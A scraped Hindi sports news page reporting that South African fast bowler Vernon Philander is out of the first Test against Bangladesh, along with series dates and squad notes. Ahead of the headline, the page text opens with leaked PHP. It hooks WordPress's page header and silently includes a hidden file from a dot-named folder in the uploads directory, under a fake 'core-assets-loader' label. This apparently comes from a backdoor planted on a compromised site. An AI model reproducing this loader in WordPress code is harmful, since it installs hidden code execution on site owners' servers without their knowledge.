add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बांग्लादेश के खिलाफ पहले टेस्ट मैच से बाहर हुए वर्नोन फिलेंडर – SOCH INDIA
Menu

खेल
बांग्लादेश के खिलाफ पहले टेस्ट मैच से बाहर हुए वर्नोन फिलेंडर

nobanner

साउथ अफ्रीका के तेज गेंदबाज वर्नोन फिलेंडर कमर में लगी चोट कारण बांग्लादेश के खिलाफ होने वाले पहले टेस्ट मैच से बाहर हो गए हैं. फिलेंडर को इस साल इंग्लैंड सीरीज के दौरान चोट लगी थी.

बांग्लादेश और साउथ अफ्रीका के बीच 28 सितम्बर से दो अक्टूबर तक पहला और छह से 10 अक्टूबर तक दूसरा टेस्ट मैच खेला जाएगा.

फिलेंडर के अलावा, ऑलराउंडर खिलाड़ी क्रिस मौरिस भी इस सीरीज में साउथ अफ्रीका की टीम में मौजूद नहीं हैं. वह अक्टूबर माह के अंत में टीम में वापसी करेंगे. इसके अलावा, तेज गेंदबाज डेल स्टेन की टीम में वापसी के लिए कोई तारीख तय नहीं की गई है.

मौरिस और फिलेंडर की अनुपस्थिति में साउथ अफ्रीका की टीम मोर्ने मोर्कल, कगीसो रबाडा, वेन पार्नेल और दुआने ओलविएर के साथ मैदान पर उतर सकती है. बांग्लादेश के लिए साउथ अफ्रीका की टेस्ट टीम की घोषणा मंगलवार को जारी प्रथम श्रेणी के मैच की समाप्ति के बाद की जाएगी.